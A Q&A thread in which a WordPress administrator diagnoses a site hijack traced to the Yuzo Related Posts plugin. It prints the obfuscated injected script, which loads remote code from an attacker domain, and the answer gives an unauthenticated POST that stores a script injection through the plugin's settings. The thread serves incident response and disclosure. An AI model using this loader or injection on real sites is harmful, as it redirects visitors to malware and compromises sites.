# Vulnerability in closed plugin Yuzo Related Posts

Tags: wordpress, security

About an hour ago a Wordpress Page I manage started redirecting to Ad/Malware Pages.

I found the source of the redirection, want to provide help for others affected and need help finding the actual vulnerability and/or a fix.

The redirection happens after the Site is done loading, so I was looking for a JavaScript Snippet in the Page and dubious redirections in the Network Analyzer. Obvious malicious redirects were: hellofromhony.org, thebiggestfavoritemake.com, nnatrevaleur.tk and a site trying to snatch my current location (could not reproduce that one more than once though).

I was able to trace the redirections down to coming from https://hellofromhony.org/counter which is embedded via a code snippet.

The snippet was embedded in wp_options in an entry with the key 'yuzo_related_post_options' - more specifically embedded in the json option 'yuzo_related_post_css_and_style' of the option_value. That option gets echoed without sanitizing.

This option is part of the Yuzo Related Posts Plugin, which got discontinued about a week ago:
https://wordpress.org/plugins/yuzo-related-post/

Removing that Plugin stopped the redirection immediately, I was not able to find other traces of tampering with the site.

The snippet that was in the option_value:

```
</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>
```

While removing the Plugin poses a quickfix, I want to dive deeper to be sure that there was no access to the database, backend and webspace.

Comment: While investigating & writing this post, two threads have appeared on the wordpress.org board:
https://wordpress.org/support/plugin/yuzo-related-post/

Comment: Someone has also written about this as early as March 30. https://www.pluginvulnerabilities.com/2019/03/30/wordpress-plugin-team-paints-target-on-exploitable-settings-change-vulnerability-that-permits-persistent-xss-in-related-posts/

Comment: Nice, thanks, did not find that when googling for known vulnerabilitys. Added that to my answer below, so Google will relate it... :)

Comment: Am I correct to assume only the wp-options regarding the plugin itself can be manipulated? I'm trying to find the maximum reach of the vulnerability.

Comment: For reference, this is the payload served by the mentioned exploit, hosted on hellofromhony.org: https://gist.github.com/stefan2904/a31a676b6fc202d2c6428acd728ad791

Comment: @Hendrik yes, that is correct. Wordpress prefixes the options automatically with the plugin identifier, so with this simple attack only the plugin-owned Options can be modified

Comment: looks like https://hellofromhony.org/scriptmyjs?t=1&/wp-includes/js/jquery/jquery_js&ver=1.12.4 is causing the issue on a site I just looked into with this issue. This link does not supply jquery.

Comment: it also appears this url will respond with the same payload regardless of the query string

Comment: Sorry, Stack Overflow is not suitable for *help me find vulnerabilities in this random plugin* questions. We can answer specific, focused questions with a limited scope.

Answer (score 9, accepted):

I do believe I just found it:
The *Yuzo Related Posts* Plugin does not check for authentication when saving options.

So POSTing

```
yuzo_related_post_css_and_style=</style><script+language=javascript>alert('hacked');</script>
```

to `/wp-admin/options-general.php?page=yuzo-related-post` will succeed, even if you're not logged in.

The Plugin is using `is_admin()` to check for authentication, but that is a "false friend" and only checks if the accessed page is in the admin-area, not if a user is authenticated (nor authorized). See the [Wordpress documentation](https://codex.wordpress.org/Function_Reference/is_admin).

A quick solution to keep using the plugin is just removing the settings option by putting false in the if-Statement in `/assets/functions/options.php` line 1155:

```php
    function __construct(){

        global $if_utils;

        $this->utils = $if_utils;

        if(false/* is_admin() */)
            self::configuration_plugin();
        else
            self::parameters();

    }
```

**Update:**

Hang Guan pointed to [a Blog Post about this issue from last week](https://www.pluginvulnerabilities.com/2019/03/30/wordpress-plugin-team-paints-target-on-exploitable-settings-change-vulnerability-that-permits-persistent-xss-in-related-posts/), seems like it is "out in the wild" now.

Comment: Depending on your WP, the exploit targets also `/wp-admin/admin-post.php?page=yuzo-related-post` ...